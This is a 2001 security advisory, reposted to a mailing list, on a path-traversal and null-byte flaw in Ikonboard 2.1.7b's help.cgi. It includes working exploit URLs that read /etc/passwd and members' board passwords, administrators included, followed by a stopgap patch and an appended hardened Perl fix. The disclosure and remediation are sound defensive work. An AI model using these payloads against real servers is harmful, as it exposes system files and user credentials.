From: Steve (steve at SECURESOLUTIONS.ORG)
Date: Mon Mar 12 2001 - 09:04:57 CST
-----Original Message-----
From: Martin J. Muench
Subject: Ikonboard v2.1.7b "show files" vulnerability
-[ Product: Ikonboard
-[ Version: 2.1.7b
-[ OS: Unix, NT
-[ Vendor: Notified, http://www.ikonboard.com
-=[ Summary ]=-
This is another bug in the Ikonboard.
Anyone can read any file on the remote system with
the privileges of the web server.
-=[ Problem ]=-
File: help.cgi
---[L.44]---
$inhelpon = $query -> param('helpon');
---
As we can see, $inhelpon is the input for 'helpon'.
---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open (FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it sets the file, runs it through the filter and opens it. -> $inhelpon, remember?! ;)
Ok, I am not going to post the whole filter it uses, because they really have been able to write a filter that is 24 lines long. And they finally forgot to filter the backslash, so we can easily just attach the 'poison null-byte' to '$inhelpon' and we escape the '.dat'. And of course the script doesn't check for "..", so we can specify every path we want.
-=[ Exploit ]=-
Example:
http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 - would show the password file, if it is readable with the privileges of the web server.
http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00 - replace <member> with the member name and it shows you his/her board-password. (works with Administrator accounts too)
http://mjm.gmc-online.de
http://www.german-secure.de
-=[ Patches ]=-
Not yet available. You could fix the script temporarily by inserting the following line under line 45 in 'help.cgi':
$inhelpon =~ s/\///g;
This is lame, but it works.
-=[ Greetings ]=-
Neilk - learned a lot from you!
Marc Ruef - I promised it ;)
DukeCS - thanks for everything!
Marko - thanks for your help!
Tribunal - you taught me a lot, thanks
ICB - long time no speak
Svoern - "go get 'em" ;)
So long,
Martin J. Muench <muench at gmc-online.de>
"Perl - The only language that looks the same before and after RSA encryption." - Keith Bostic
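The advisory above shows the vulnerable lines of help.cgi and a one-line slash filter as a stopgap. As an added illustration, not part of the advisory and not Ikonboard's code, here is a more restrictive way to write the same file-selection step in Perl: an allow-list on the 'helpon' topic name, so that "..", "/", and NUL bytes never reach open() at all. The installation path in $ikondir and the topic-name format (letters, digits, '_' and '-') are assumptions; the help/<topic>.dat layout follows the advisory.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Added example, not Ikonboard code. Hardened replacement for the
# file-selection logic quoted from help.cgi (lines 44 and 95-97).
my $ikondir = '/var/www/ikonboard/';   # assumed installation path

# Return the path to open for a help topic, or undef if the topic
# name is not acceptable. An allow-list is used instead of stripping
# dangerous characters, so anything the old strip filter missed
# (the NUL byte in particular) is rejected along with '/', '\' and '.'.
sub help_file_for {
    my ($inhelpon) = @_;
    return undef unless defined $inhelpon;
    return undef unless $inhelpon =~ /\A[A-Za-z0-9_-]{1,32}\z/;
    return $ikondir . "help/$inhelpon.dat";
}

# Three-argument open with an explicit read mode: the filename can then
# never be interpreted as a mode prefix or pipe by open() itself.
sub open_help {
    my ($inhelpon) = @_;
    my $file = help_file_for($inhelpon);
    die "Invalid help topic\n" unless defined $file;
    open(my $fh, '<', $file) or die "Cannot locate the required files\n";
    local $/;                 # slurp the whole file
    my $contents = <$fh>;
    close $fh;
    return $contents;
}

# Constructed inputs: the first two are the payload shapes from the
# advisory (traversal plus a poison NUL byte), the third is a normal topic.
my @probes = (
    "../../../../../etc/passwd\0",
    "../members/<member>.cgi\0",
    "registering",
);
for my $p (@probes) {
    my $shown = $p;
    $shown =~ s/\0/\\0/g;     # make the NUL visible when printed
    my $path = help_file_for($p);
    printf "%-32s => %s\n", $shown, defined $path ? $path : 'REJECTED';
}
```

Both traversal probes are rejected before any path is built, and only the plain topic name resolves to a file under help/. Checking the parameter against the set of values it is allowed to have, rather than removing the characters known to be harmful, means the filter does not need to anticipate the next encoding trick.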